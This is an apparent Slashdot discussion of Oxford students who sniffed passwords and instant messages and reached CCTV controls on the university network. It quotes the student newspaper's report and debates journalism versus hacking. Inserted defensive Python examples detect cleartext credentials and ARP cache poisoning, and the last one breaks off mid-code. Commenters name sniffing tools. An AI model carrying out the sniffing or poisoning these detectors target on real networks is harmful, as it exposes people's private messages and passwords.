Oxford Students Hack University Network
An anonymous reader writes "Both The Guardian and BBC News are carrying the story that two students at the University of Oxford, Patrick Foster and Roger Waite, were able to easily hack into the university's internal network in minutes using only easily-available software. Once inside, they could find out anyone's email password, observe instant messenger conversations and control parts of the university's CCTV system. The students were investigating the university's network security for the student newspaper, The Oxford Student, which published a front page article and editorial on the matter. In the article, a university spokesperson is quoted as saying 'In some cases the wish to provide the widest possible computer access as cheaply as possible may mean deciding to go for a cheaper set-up, with potentially lower security.' The students now face disciplinary proceedings from the university and could receive rustication (suspension) and a 500 pound fine. The matter has also been passed on to the police."
What appropriately aged Slashdotter hasn't hacked into their university or college's network?
These are the future leaders of the world. Don't forget it.
... a.k.a. A Beginner's Guide to tcpdump and ettercap
Now that is a heavy fine.
The school is feeling embarrassed, and vengeful, so they make an example of the students; the students were only hacking the network to produce a news article on the lacklustre security at Oxford. They have a right to obtain evidence to support an article on the security systems, even by showing how the system can be broken into. Students likely have been complaining about it for some time.
From my perspective, the student body has a right to be certain if the use of the school network is going to compromise any of their personal information. Do you know how many students use school networks to check banking information?
These white hat hackers have given the school a present and they are slapped in the face for it. Any action against the journalists will only smear Oxford's reputation further. They should simply thank them and make the necessary changes to improve security.
Shit, if I know this, and some multiple-PHD administrator can't figure it out, what does that say about the level of comprehension at Oxford?
The dangers of knowledge trigger emotional distress in human beings.
Move on. How many stories have there been on slashdot of this exact same thing happening?
A works for/goes to/etc B.
A finds exploit in B's Systems
A exploits systems.
A finally gets around to telling B.
A gets in trouble for violating laws and/or rules of B.
.. has to be having the police handle a situation that they don't understand.
Why did they use names in the paper--they could have used an anonymous source.
They should be damn well "rusticated" for their taste in music alone!
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do." In a warning to students, he added: "I am able to monitor my network, and student regulations mean that any member abusing it would find themselves before the Dean."
:)
;)
Er, require strong passwords? Hm, yeah, that'd work, and I guess it is "little" to do
The OxStu has agreed not to pass on the methods used to carry out such actions, which fall foul of both the law and OUCS guidelines. One computer expert told The OxStu that the actions were virtually untraceable.
How clever of them -- security by obscurity. I'm sure those "methods" would be far too complex for us to understand anyway, right?
It can take less than a minute to obtain an individual student's email password. A student at College B whose password was compromised told The OxStu: "It's absolutely ridiculous that security could be so light. I'll certainly be changing my password regularly in the future."
Oh! So that's it. Weak passwords (or maybe a little social engineering, or both.) Gosh -- better keep a lid on that secret.
They will be punished and fined for embarrassing the school, not because they broke the law.
This should be a valuable lesson to everyone, always get permission before "investigating". Surprisingly often, you can get permission--especially if you represent something like a campus newspaper, where they can assume you'll be responsible.
They could have asked for permission to attempt and hack into the network before actually doing it. At my university, there was a group of students who asked to test the network security and they got permission to try in the summer between a summer session block when not too many people were using the network. It also meant that when they printed their findings, not too many people were around to read it because it was obviously summer session. They didn't find many security lapses, heck if I remember correctly it was printed up on page 6 of the student newspaper.
So next time you are in the UK and you see someone forgetting to lock his door or forgetting his bag, beware before you go and tell him ... you could be a possible housebreaker or a purse snatcher. Come on guys, this is a couple of college students finding a flaw in their university's system which may compromise their privacy and bang .... they get punished !!! Ok ok they went for some publicity but shouldn't Oxford just say thanks and bash/change/think about their network administration
See what investigative journalism gets you? You'd be better to leave it all alone and let the system be full of holes. I mean, we don't want responsible people to break in and tell us what our problem is. We'd rather someone malicious got in nice and quiet like, and we would never know the difference.
Bloody reporters. Free speech be damned, this time they have gone too far.
Absolutely. The Uni's should try and foster an open environment, and not be so bloody harsh on students - who, do occasionally 'bend the rules'.
This is probably the only time in peoples lives that they can experiment like this, and they shouldn't be heavily fined/expelled/sued. Maybe a formal 'slap on the wrist', but that's it.
It's Uni - not a top secret government agency.
While this is an extreme hack and what not, you'd be surprised about how much resistance there is to security on a university setting. When my university installed email/virus scanning software, it was a HUGE deal and nearly wasn't installed because of concerns of academic freedom.
When I suggested turning on the Windows Firewall on Faculty PCs, I was told that it was a no no because it could interfere with Academic freedom. Freedom above everything else is the university motto.
> They could have asked for permission to attempt and hack into the network
They wouldn't give the journalists permission to do that, because it would involve spending money on improving security, plus most higher ups are computer peasants. Hacking the network was half an act of civil disobedience and the other half of journalism. Either way, Oxford has some dumbass administrators on high, if they follow through on the charges.
Speaking as someone who sysadmin'd at one of the top five universities in my country, I can say that most universities are like this.
Security is lax, well, because the information that someone would want to steal is usually already available on the various faculty websites.
The only things I can think of that are actually worth securing ARE secured. Who cares if these guys can change someones email password. Most uni students don't even use their supplied email addresses, and they are usually only used as a redundant means of sending out marks. I wouldn't be worried about the CCTV monitoring either. It's not like the CCTV was viewing some "restricted" area of the university. Want to see what's going on? Walk down there and take a look. *gasp*.
I'm probably being a troll (I can't even tell anymore) but honestly, most university security is so lax because there simply isn't that much data that requires securing.
The intent of the students was to act as journalists in the interest of the student body. They have every right to force the school to increase spending on security. If anything, Oxford could find themselves sued by the student body over this.
It was a risky move, but there was no other way to force the school to change their policies.
If they were Americans they could be in Camp Xray already playing naked pile up with a hood over their head. Our 'Patriot' act would see to that. Did anyone else see that the Bush administration admitted the other day that the Patriot Act is being used for routine police investigations such as porn and kidnapping?
White-hat my ass, they didn't ask for permission to crack the system first; they did it, THEN told them they did it, how easy it was and oh yea, it was for altruistic purposes.
In this day and age of computers being ubiquitous with education, and many college kids, regardless of what school you end up going to, not knowing damn near the first thing about computer security, rooting a system is hardly an accomplishment. What it is though, is invasion of privacy, more than likely an infringement on the User Agreement which all colleges I've been to have to get on their network, and a really REALLY dumb way of propping yourself up to look cool.
As for What they did, looking into MSN conversations isn't hard, it's plaintext across a network, set up a box to dump all the shit it gets and voila, hours of juicy reading material.
E-mail passwords are also easy to get plaintext, unless the users of the network use some type of security layer, (SSL and the like) otherwise if you go to a normal webmail account, (http://webmail.schooname.com) you send your shit plaintext most of the time, Purdue, BSU, and a few other Indiana schools do that.
The only thing I think that is dumb on the administration's part is having the Closed Circuit Televisions controlled via the internal network, that shit should be on a totally different network, that is the only real folly I see that is just nasty. Otherwise most of the shit is just because people are not security conscious.
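The comment above makes the point that MSN traffic and webmail logins crossed the network in the clear. A defender's version of that observation is a monitoring rule that reports when a credential is submitted over a cleartext transport, without recording the secret itself. The following is an added example and not code from the thread or from any of the posters; the sample requests, hostnames and client addresses are constructed, and the list of credential field names is an assumption that a real deployment would extend for its own webmail software.

```python
"""Flag HTTP requests that carry credentials over a cleartext transport.

Added example (not from the thread). It models the monitoring rule a network
team would run: report *that* a password travelled in the clear, without
recording the secret itself. Sample requests are constructed, not captured.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Field names commonly used for secrets in login forms (assumption: a
# deployment would extend this list for its own webmail software).
CREDENTIAL_FIELD = re.compile(r"^(pass(word|wd)?|pwd|secret)$", re.IGNORECASE)

# Constructed sample flows seen on cleartext ports: (client, dst_port, raw request).
# The Basic header decodes to "user:fakepass"; none of this is real traffic.
SAMPLE_FLOWS = [
    ("10.0.0.42", 80,
     "POST /webmail/login HTTP/1.1\r\nHost: webmail.example.edu\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "user=alice&password=hunter2"),
    ("10.0.0.43", 80,
     "GET /index.html HTTP/1.1\r\nHost: www.example.edu\r\n\r\n"),
    ("10.0.0.44", 80,
     "GET /cgi-bin/login?user=bob&pwd=letmein HTTP/1.1\r\n"
     "Host: webmail.example.edu\r\n\r\n"),
    ("10.0.0.45", 8080,
     "GET /admin/ HTTP/1.1\r\nHost: cctv.example.edu\r\n"
     "Authorization: Basic dXNlcjpmYWtlcGFzcw==\r\n\r\n"),
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_cleartext_credentials(flows):
    """Return one alert per request that exposes a credential in the clear.

    Alerts name the exposed field or header only; values are dropped so the
    monitoring system does not itself become a store of harvested passwords.
    """
    alerts = []
    for client, port, raw in flows:
        method, path, headers, body = parse_request(raw)
        split = urlsplit(path)
        exposed = []
        # Form fields in the query string and, for urlencoded bodies, the body.
        candidates = parse_qsl(split.query, keep_blank_values=True)
        if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            candidates += parse_qsl(body, keep_blank_values=True)
        exposed += [f"form:{name}" for name, _value in candidates
                    if CREDENTIAL_FIELD.match(name)]
        # HTTP Basic auth is base64, not encryption: the user:password pair is readable.
        if headers.get("authorization", "").lower().startswith("basic "):
            exposed.append("header:authorization-basic")
        if exposed:
            alerts.append({
                "client": client,
                "host": headers.get("host", "?"),
                "port": port,
                "request": f"{method} {split.path}",
                "exposed": exposed,  # names only; secret values are deliberately omitted
            })
    return alerts


if __name__ == "__main__":
    for alert in find_cleartext_credentials(SAMPLE_FLOWS):
        print(alert)
```

The rule fires on three of the four constructed requests (a POST form field, a password in a query string, and a Basic header) and stays silent on the plain page fetch; the fix it points at is the one the comment names, terminating those services behind TLS so the sniffer sees nothing to match.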
Do you even know what "rule of law" means? It means NO ONE is above the law. Not the president, not the police, not even investigative journalists.
What the two students did was clearly in violation of university policy and criminal law, and need to be punished accordingly.
Yes, the fact that their primary intention was journalism should be considered as a mitigating factor, but I see no reason why it should get them off the hook for having committed several crimes.
Really, they broke the law for a sensational story for which they could have written a less interesting story without the privacy violations. I don't consider them to have a "journalistic duty to society" justification.
I can understand journalism where people trespassed on the Manhattan Project grounds. There's really no other way to demonstrate that you can get into nuclear research facilities other than to do so.
On the other hand, they could have easily said "we have found the following vulnerability, which probably allows us full access to X, Y, and Z". They would have done their security work (and if they got hammered by the network admins for probing the network, I'd agree the admins should get chewed out), would have gotten their story, and so forth. Oh, and this assumes that they notified the admins far enough in advance of their publish date that the problem could be *fixed* before all the students at the university were told about it -- unlike the Manhattan Project, where a couple more guards can just be rolled out or reassigned from another location temporarily, it may take a bit to test software changes before a rollout is appropriate.
Besides, if all it takes is the willingness to write an article later to avoid getting in trouble, people can be poking around some awfully dicey places.
> I don't buy their arguments about doing all of this in the best interests of the school.
Someone who has obviously never gone up against a belligerent administration before. This was the only way to get the money required to make changes to the security. Without proof there is but conjecture and speculation.
Reminds me of my first year in college where I tried logging into the school server from my dorm computer on the school network with login root and password root....
:-)
:-)
I was just curious at the time
A day later I get a rather straightforward e-mail from the system op, telling me to stop, or they will report me to the appropriate authorities, and about possible disciplinary options.
Well at least I found out that they were smart enough to change the password, and keep an eye on what people were trying to do
University IT network wide open to hackers
Email passwords and MSN Messenger Conversations easily accessible.
CCTV networks can be compromised.
University says colleges' drive to cut costs could compromise security.
Computer networks across the University lie wide open to hackers, due to serious failings in IT security provision.
An investigation by The Oxford Student has learnt that CCTV cameras, email passwords and MSN Messenger conversations can be compromised with ease by members of the University with only a modicum of technical knowledge, jeopardising the privacy and safety of students and dons alike.
It is understood that by using software that is freely and easily accessible over the internet, every student has the power to snoop on the MSN Messenger conversations of others or infiltrate their Webmail account. More advanced users can even tap into college CCTV networks, with the possibility of disrupting the entire system, forcing colleges into total security blackouts.
A University spokesperson told The OxStu: "In some cases the wish to provide the widest possible computer access as cheaply as possible may mean deciding to go for a cheaper set-up, with potentially lower security." Just how low the security across the University is has now become clear.
Access to the video-streaming of CCTV footage of College A was easily available, pictured right, and cameras across the College could be taken down at the touch of a button. One student who appeared in security footage accessed said: "As well as understanding the security implications, it was personally shocking and especially worrying."
As such networks are put in place to safeguard the security of College members, the fact that they can be easily bypassed should send a serious message to staff responsible for their upkeep.
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do." In a warning to students, he added: "I am able to monitor my network, and student regulations mean that any member abusing it would find themselves before the Dean."
The OxStu has agreed not to pass on the methods used to carry out such actions, which fall foul of both the law and OUCS guidelines. One computer expert told The OxStu that the actions were virtually untraceable.
It can take less than a minute to obtain an individual student's email password. A student at College B whose password was compromised told The OxStu: "It's absolutely ridiculous that security could be so light. I'll certainly be changing my password regularly in the future."
Likewise at College C a first year student's Webmail password was obtained. The student told The OxStu: "I'm outraged. I've personal as well as employment and academic related information in my account, which is private." College B's IT Officer said: "There is a rolling programme to upgrade [the network]...If students are abusing it, it is a concern."
Similarly, conversations held over instant messaging programmes can be easily intercepted. A Human Sciences student said it was "insane and quite disturbing...not something you want others to see." Her conversation was eavesdropped upon as she told another member of the same College about her essay crisis. One student at College D, who declined to be named, told The OxStu the problem was "shady", as we recounted her conversation to her. College D refused to comment, on the basis that it felt the law had been broken in relation to these activities.
A University spokesperson said: "Security measures are constantly reviewed in order to minimize the security risks. Of course, anyone found to have breached security with ill intent would be subject to punishment."
At the time of going to press, The OxStu was in the process of handing over all the data given to the investigation to both the police and the University.
Quite apart from University Regulations students should be aware of 1(1) of the Computer Misuse Act 199
>>were able to easily hack into the university's internal network
So what? It is always as easy especially if you are some kind of insider. But normally you do not hack your university for good reasons:
a) It is yours.
b) You will get a lot of trouble / lose accounts.
I think the university officials need to thank the students for their work in exploiting the security vulnerabilities.
MAYBE, if their exploit didn't involve publishing the vulnerability to the general populace. Worst case scenario, it gets picked up by the BBC and/or
It is 100 times better for two students without malicious cause to break into the internal networks than for malicious individuals to do the same.
They've publicly invited every literate/malicious individual to do so. Getting a killer scoop at the expense of the school's security comes close enough to malicious in my book. In the real world, few (statistic pulled out of my ass based on number of companies/organizations who plug in/install and go, not size or profitability) have "adequately" secure systems, be it the refusal or inability to spend the time or money to do so, let alone keep up. Anonymity IS part of a system's security. By publishing this article they've opened up the school's network to attention it wouldn't have received otherwise. Maybe the Admins will be able to make necessary adjustments before backdoors are added. Maybe they didn't even have the staff to secure it properly. Point is, the consequence of their actions is that students are more vulnerable than they were before the story was published. Intentions be damned, they f^@%ed up.
But the police should be called, and when they see how lax the university was at keeping sensitive information private, they should file charges against Oxford too.
Then they can put Oxford Hack in the dictionary:
Someone who tattles, and gets in trouble too because of their guilt in the incident.
Relevantly, they managed to find and clamp down on compromised boxes (usually Win, or unpatched linux boxes) pretty quickly. They also had some very good techs (as well as some pretty nifty stuff, eg ADSM backup of private machines for all users).
Based on the info these guys say they got, it looks like at least partly what they were doing was just packet-sniffing. Not sure how the cctv stuff works, as I know the newest cctv gear has been installed since I left.
If it's just that, then there is at least one precedent at Oxford, as a number of passwords of POP users were captured by a compromised linux box (vanilla, unpatched RedHat 3 or 4, iirc) in about 98 or 99. OUCS detected the box, and then the sniffing, within one or two hours and froze all accounts, which I thought was pretty good going for such a huge place.
I'd have preferred if these guys had just told OUCS in private, instead of trumpeting about it in the papers. Wouldn't surprise me if they were charged ... I wonder if Thames Valley Police will run the investigation? :)
Just script kiddies. They managed to hack in ... but they didn't manage to escape detection. Does it really matter if you can't get out cleanly? Now they're going to be facing heavy penalties. They should have planned it out better before they undertook their hack.
probably just trying to divert people's attention from what would be a highly embarrassing situation for them.
This isn't the early '80s folks.
Breaking into other people's computers without permission is a Very Bad Thing and an example must be made.
These students should've faced criminal charges.
Having said that, they had good intent, and deferred adjudication with a year or so's probation, a weekend in jail, and a fine they could work off with community service hours* would be appropriate. If they meet the terms of their probation, their criminal record can be expunged.
*appropriate community service includes helping audit security for the university's computers.
Otherwise, he gets the blame. Believe me, I've been there. Unless you can document that you had a solution in mind, they'll "hang you from the highest yard-arm".
Imagine never failing another subject.
Imagine being able to push your enemies down a grade.
Imagine making some extra cash selling exam information.
Imagine trashing the occasional file to irk a disliked professor.
Imagine that the organisation responsible for stopping you doing these things spends more time complaining about white hats than it does stopping black hats.
Imagine how much easier life would be not doing the right thing.
Just imagine...
Whether they did it for self aggrandisement or not, whistle-blowers make it safe for the rest of us. I don't have the skill to test security like this. But it's nice to know that there are self-serving show-offs who will do it for me. More power to them.
True the students were producing a news article about the computer security at Oxford, but is hacking the same system a good idea to do? If we were to allow that to go unpunished, what would happen next? Would we let people who bring bombs onboard airplanes go 'because they wanted to show how lackluster airport security was'? Would we let people who speed down highways at dangerously high speeds on purpose 'because they wanted to show how lackluster funding to police made them unequipped for ultra fast muscle cars'?
This goes beyond public appearance of the college. What do you think Slashdot would do if you were to post a comment here explaining how it is possible to hack and take down the Slashdot server without asking for their permission to publish it, let alone attempt to confirm it? You'd have your user account banned to say the least. You wanna publish an exploit to the newest version of Windows Internet Explorer without telling Microsoft? Go ahead, but you mighta just caused the newest virus outbreak. You wanna publish how you managed to hack into the CIA database? Go ahead, but Russian KGB hackers just used that exploit to gain access their systems. Etc, etc, etc.
Wait, these guys can get into Oxford and they don't know better than to write these types of articles anonymously?
I don't know if Oxford should be more worried about their network or their entrance standards....
Nowadays I'm more of the opinion that companies and universities don't care whether or not you can unravel their sweaters by pulling at a single string. It was a cute trick 10 years ago, but it's just getting tiring now.
A lot of modern society is based on such concepts as "trusted networks" - not in the computer sense, but in the social sense. You're free to the services an entity provides, but please don't abuse them.
Personally I think it works better that way.
What country are you from btw? I only ask because in the USA, there's a whole host of information that have access controls set on them by the Federal Gov't. Especially medical information... with the new laws they've passed, god help you if you screw it up.
As someone who sysadmin'd at one of the top five universities in his country, I find it disturbing how easily you dismiss students' e-mail addresses. Did it ever occur to you that... someone might actually send mail while pretending to be someone else!!! Some colleges and unis send grades, schedules and who knows what else directly to students' email. Pretty handy for a stalker right?
maybe you're just getting a little excited, because I don't think you're trolling. Otherwise your statements would suggest extreme incompetence.
And why is this? Maybe we have different ideas about what constitutes "information worth stealing"
They also have to learn that it doesn't pay to go against the system... ;p
Shouldn't that really be Oxidation?
Believe me, I'm as surprised by my comment as you are.
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do."
Somebody fire this person.
The FBI had been informed about both the first and the second WTC attacks, but didn't do shit to stop them.
If it had been more widely publicized after the first WTC attack, then maybe they would have done something to prevent the second.
Well yes, keeping a network segmented and firewalled where necessary is a part of it. He claims he's able to monitor his network, but apparently doesn't bother to. Arp cache poisoning attacks are pretty loud and easily detectable, even with inexpensive hardware and software. Of course someone who puts a CCTV security camera network on the same network segment as the one providing student access isn't particularly concerned with security.
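The comment above says ARP cache poisoning is loud and easy to detect with cheap tooling. Below is an added example of that detection, not code from the thread or from any poster: it reads a constructed, simplified log whose lines loosely follow tcpdump's ARP reply format ("<ip> is-at <mac>"), raises an alert whenever an IP address changes its hardware address, flags a single station claiming several addresses, and, as the mitigation the comment hints at, checks replies against a pinned gateway mapping. The addresses, timestamps and the TRUSTED_HOSTS table are all assumptions.

```python
"""Detect ARP cache poisoning from a log of ARP replies.

Added example (not from the thread). The input is a constructed, simplified
log whose lines loosely follow tcpdump's ARP output ("<ip> is-at <mac>");
a real deployment would feed it from a packet capture or switch telemetry.
"""
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d) reply (?P<ip>\d+\.\d+\.\d+\.\d+) "
    r"is-at (?P<mac>[0-9a-fA-F:]{17})$"
)

# Constructed sample: the gateway 10.0.0.1 and host 10.0.0.7 are announced
# legitimately, then a third station starts claiming both addresses.
SAMPLE_ARP_LOG = """\
12:00:01 reply 10.0.0.1 is-at 00:11:22:33:44:01
12:00:02 reply 10.0.0.7 is-at 00:11:22:33:44:07
12:00:03 reply 10.0.0.1 is-at 00:11:22:33:44:01
12:00:04 reply 10.0.0.1 is-at de:ad:be:ef:00:99
12:00:04 reply 10.0.0.7 is-at de:ad:be:ef:00:99
12:00:05 reply 10.0.0.1 is-at de:ad:be:ef:00:99
12:00:06 reply 10.0.0.1 is-at de:ad:be:ef:00:99
"""

# Assumed pinned mapping for the gateway. Static entries (or the same table
# pushed to switches as dynamic ARP inspection) are the usual mitigation.
TRUSTED_HOSTS = {"10.0.0.1": "00:11:22:33:44:01"}


def parse_arp_log(text):
    """Return (timestamp, ip, mac) tuples; lines that are not replies are skipped."""
    events = []
    for line in text.splitlines():
        m = ARP_REPLY.match(line.strip())
        if m:
            events.append((m["ts"], m["ip"], m["mac"].lower()))
    return events


def detect_arp_poisoning(events, trusted_hosts=None):
    """Learn IP->MAC bindings in order and report the three classic signals.

    mapping_changes:   an IP that was announced with one MAC now claims another.
    multi_ip_macs:     one MAC answering for several IPs (gateway plus victims).
    trusted_conflicts: any reply that contradicts a pinned mapping.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted_hosts or {}).items()}
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    mapping_changes, trusted_conflicts = [], []
    for ts, ip, mac in events:
        mac_to_ips[mac].add(ip)
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            mapping_changes.append((ts, ip, previous, mac))
        ip_to_mac[ip] = mac
        if ip in trusted and trusted[ip] != mac:
            trusted_conflicts.append((ts, ip, mac))
    multi_ip_macs = {m: sorted(ips) for m, ips in mac_to_ips.items() if len(ips) > 1}
    return {
        "mapping_changes": mapping_changes,
        "multi_ip_macs": multi_ip_macs,
        "trusted_conflicts": trusted_conflicts,
    }


if __name__ == "__main__":
    report = detect_arp_poisoning(parse_arp_log(SAMPLE_ARP_LOG), TRUSTED_HOSTS)
    for kind, items in report.items():
        print(kind, items)
```

On the constructed log the learner sees two binding changes at 12:00:04, one MAC answering for both the gateway and 10.0.0.7, and three replies contradicting the pinned gateway entry; on the first three lines alone it reports nothing. The pinned table is the part worth copying: the learned state can be poisoned before the monitor starts, the static entry cannot.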
I made a deal with the school... Don't expel me... I'll help you fix it. Also admitting through an anonymous hotmail account helped... especially since every time I logged in it was from the school IP address.
Whitehats hack with permission. A security consultant you pay to check your network is a whitehat. Someone that hacks it on their own is a blackhat. There is NO right to obtain evidence through illegal means. You must ask permission first.
Let me turn it to the real world. Suppose I break in your house (something I'm sure I could easily do, 99.999% of houses have shitty physical security) look at your things to see what I could get at, then tell you about it later. Is that ok? I mean I didn't hurt anything, and I gave you a report, so it's ok right? Wrong, it's not ok, I broke the law.
Same thing. You aren't allowed to hack systems without permission. I don't care why you are doing it, you still aren't allowed to. This isn't a matter up for debate, it's the law, and it directly relates to physical privacy and security laws.
Your stuff is your stuff, and the rest of the world is welcome to keep the fuck out.
Here's the deal, before you all start burning megabytes on the debate whether or not this people were whitehat or blackhat, or whether it creates a slippery slope that will usher in a horde of script kiddies, there's one thing that you all need to remember:
This was an action of the press.
Let me repeat myself, because it's important.
This was an action of the press.
It is the purpose of the press to keep whoever is in power accountable. In the United States of America, this role was so important that until the mid 1970s* the press was considered to be the fourth branch of government. Now things might be a little different over in the United Kingdom, but the last time I checked, their press sometimes tries to expose and keep in check authority there as well.
This isn't a bunch of kids who hax0r1zed the system, and then cranked out a Cult of the Dead Cow text file, and said, "You g0t p0wn3d - but w5 R da Pr3ss."
These were members of the legitimate press, who in the course of their duties as members of a free press, alerted a population about a situation where the authorities who they trust to provide security have failed in carrying out their responsibilities.
* Okay, maybe that 1970s remark was a little sarcastic, but with all the media consolidation by the same megacorporations who buy and sell the elite of the american government, can you really describe it as the fourth branch of government anymore?
to avoid the expected karma-shelling.
The university I work for actually has fairly good security over all. Not great, but better than many. However for things like financials and student records, the security is much better. Just because you can get in to a system doesn't mean you can get into the IBM mainframe that holds the important data. You might be able to sniff a cleartext AIM conversation, you won't break the AES encrypted link someone is using to the mainframe.
I don't know Oxford's overall situation and frankly, I don't really care. I'm concerned about a department at my university. However I do understand that a university environment places unique constraints on what you can secure. Much as we'd like to lock everything down really tight, we simply aren't allowed to, generally in the name of academic freedom.
For example we manage most, but not all, of the systems in the building. Manage means have the admin/root password, apply patches, etc. However some research labs won't allow that. Guess what? They are the ones that get viruses or get hacked. Reason being they don't secure their systems properly. Well, nothing we can do about it. The faculty committee, department head, dean, president, and regents all support people running their own systems in the name of academic freedom.
I am appalled at the number of people justifying what Oxford University is attempting to do. Have you heard of Whistleblowing, which I consider a fundamental service to any functioning democracy?
Look Oxford has been entrusted with the personal information of their students. They are the ones that should be facing the heavy and long arm of the law and not the students that brought the problems to everyone's attention.
As long as they did not do any harm, and they didn't, these students ought to be rewarded, not punished. How the fuck are you supposed to find out if a university is doing what it's supposed to? Are we supposed to just take at their word?
I don't think so!
They should've given some sort of warning to what they were going to do, or try to do. And if it could be accomplished, show Oxford the easy holes in their security sys. I mean, they should be grateful for having a free personal security check. :-/
(Don't big companies do that? Hire "hackers" to see if they can find loop holes in their network security.) Anyways...
What's going on ? When I was a student, our teachers offered highest marks in system programming to everyone who could hack the department network. A student had a choice : to study everything or just to prove himself capable. After each successful break in, the hole was patched and the network became more protected.
This is the proper way. But making the unprotected network and call police... it's a degradation.
But they still sat around, snooping for three days.
are the ones who set up the systems, including those who approved of it. Yes, I know Oxford is a really poor college, and their students all come from the English countryside, for them to justify their rants of giving their students free connectivity.
as is the case with any spokesperson (in this case, university spokeswoman), bullshit has been spewed.
and where is the interview with those who were managing this setup, i wonder?
Piss off!
What did they do ...
...
login
su root
Password : password
OMG the password was password
WOW THIS IS JUST LIKE EVERY OTHER NETWORK SERVER !
- MOSKIE
This was just a couple of punk-ass script kiddies trying to make the school administration look bad. Seriously, what did they think was going to happen? It's one thing to do serious research in an ethical manner, and another to play 31337 h@xor script kiddie under the guise of journalism. They aren't even good script kiddies -- they got caught way too easily.
It's a university--a place of learning and cooperation. You shouldn't lock it down any more than a campus should be run like a high security prison.
If the university actually did run the network securely, shutting down most ports, controlling what kind of software people get to install, enforcing password and security policies, then people would bitch about how much the network is run like a police state.
That doesn't mean individual services shouldn't be more careful--access to CCTV cameras should, perhaps, be locked down (or they should be completely open).
Shouldn't the school face some kind of punishment for encouraging and/or requiring use of a network which is by design not secure?
Europe has some very strong (quite paranoid, probably too paranoid) data protection laws, and while I don't support just hacking everything in sight and shouting about it from every rooftop, something needs to be done about the people who didn't do enough to protect the computers and networks.
-PM
Another interesting article by Patrick Foster can be found here
Mr Foster contacted the university for comment, revealing how he had gathered the information. He received an email from the proctors saying they had reason to suspect he had committed a criminal act and would be referred to Thames Valley police. Half an hour later, and three weeks before his exams, Mr Foster's university email account was cut off and all his IT privileges were revoked.
So he waved his name around before the article. In any case (I imagine) the Uni or police probably would have slapped the paper with a fine or done something nasty to go after the names. Of course I'm thinking of Australian Unis here.
Jeez, haven't we heard this one before? I find it so funny that frightened institutions always punish those who freely publish their experiences to help fix security holes. All this does is give hackers an incentive to leave the holes be, and potentially make money informing a select dubious few about them.
OK, so the need for better network security with a bunch of 17-18 year olds around is obvious and they wanted to prove it. That's all fine and good. But why in the world did they put their names on the article?!
As an aside, my school (a University of California campus) uses different VLANs for each student computer lab, on a separate subnet from anything else. Core campus systems are protected, student-accessible ones using mainly Kerberos.
Whether they did it for the good of the school or not, what they did was wrong, wrong, wrong. Is this what novice journalists are being taught, that the ends justify the means?
If they did it to help the school, they should have known that there were risks involved and taken these risks into account before publishing.
In looking over the newspaper website, I see that this is published by the Oxford Student Union; I have no knowledge to the contrary, so I will assume that the publication is done without editorial overview from a faculty member who would (it is to be hoped) point out such dangers to these nascent Woodsteins.
Stephen R. Schaffter schaffter@schaffter.org http://www.schaffter.org
If the university uses CCTV to monitor the activities of people on its grounds, then those people _should_ have access to the camera feeds. The students (and staff etc) should have the right to check what the security staff are getting their voyeuristic jollies from at any time. Any organisation that performs this wide-scale CCTV surveillance has an obligation to provide access to anybody who has legitimate business on the premises who wants to see what is being filmed.
It does seem, though, that this security breach allowed unauthorised _moving_ of the cameras, which obviously should be restricted to avoid abuse.
"We discovered some security issues on the network that were swiftly remedied by the administration" is a win-win situation for both parties.
"We discovered some security issues on the network that the idiots at administration are too dumb to find and correct" is not.
Actually, I think the second alternative makes you look very unhelpful and most people don't like their kind...
That's a heavy fine. Are they still using stone tablets over there?
Prosecute the Messenger
I've audited everything from banks to schools and I must say that a College campus network environment is by far the most unique environment that I've ever audited.
Corporations, banks, etc all work to protect themselves from the internet, whereas colleges need to protect the internet from their internal users. It's a very interesting paradigm shift.
I've seen universities that literally connect the internet to the DMZ interface on their firewall, and then connect the residential dorm network to the external interface. (Thereby trusting their students less than they do the entire internet.)
That being said; Kids are curious, and they're learning about computers and exploring their environment. If the network admins have done nothing to protect their network then I say they're at fault, but I highly doubt that is the case. I've worked with all types of educational institutions, from Catholic girls' schools to Ivy League institutes and none of them were irresponsible when it came to their security.
Nobody is saying that they need to completely lock down the entire network and turn it into a prison camp; they simply need to perform their due diligence to protect their network.
The three pillars of computer security consist of Accessibility, Availability, and Integrity. For the college, integrity is the most important. You don't want kids creating, modifying, or deleting their attendance information. You want to make sure that information is available to the users and that access to that information is accessible by those who are authorized to access it.
Yes, it is possible to hack any network and perform ARP cache poisoning (just check out the tool Cain & Abel @ www.oxid.it) and you can see how powerful these hacking utilities are and how easy it is to capture data like this: intercept IM conversations, decrypt passwords and create a whole lot of problems for responsible admins.
From the sounds of this article, it looks like they came across this Cain & Abel utility, played with it, and wrote an article saying that university staff was incompetent when in fact there is little to nothing that an administrator can do to protect against such an attack short of creating a prison camp of a network.
I say that they should make an example of these script kiddies.
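The post above names ARP cache poisoning as the mechanism and concludes there is little an administrator can do about it. What a network team can at least do is see it happening: ARP replies on a segment are cheap to watch, and an address whose MAC binding suddenly changes is the on-the-wire signature of poisoning, which is the approach arpwatch-type monitors take. Below is an added example written for this page, not code from the thread or from any tool mentioned in it; the addresses, MACs and timestamps are constructed sample data, and in practice the observations would come from a capture library or from the switches themselves.

```python
"""Arpwatch-style ARP monitor (added example; not from the thread or any
named tool).  It records the MAC first seen answering for each IP and
reports any later change, which is the on-the-wire signature of ARP cache
poisoning.  All observations below are constructed sample data."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    ts: float         # seconds since start of capture (constructed)
    sender_ip: str    # address the reply claims to answer for
    sender_mac: str   # hardware address making that claim


@dataclass
class ArpMonitor:
    bindings: dict = field(default_factory=dict)                      # ip -> current mac
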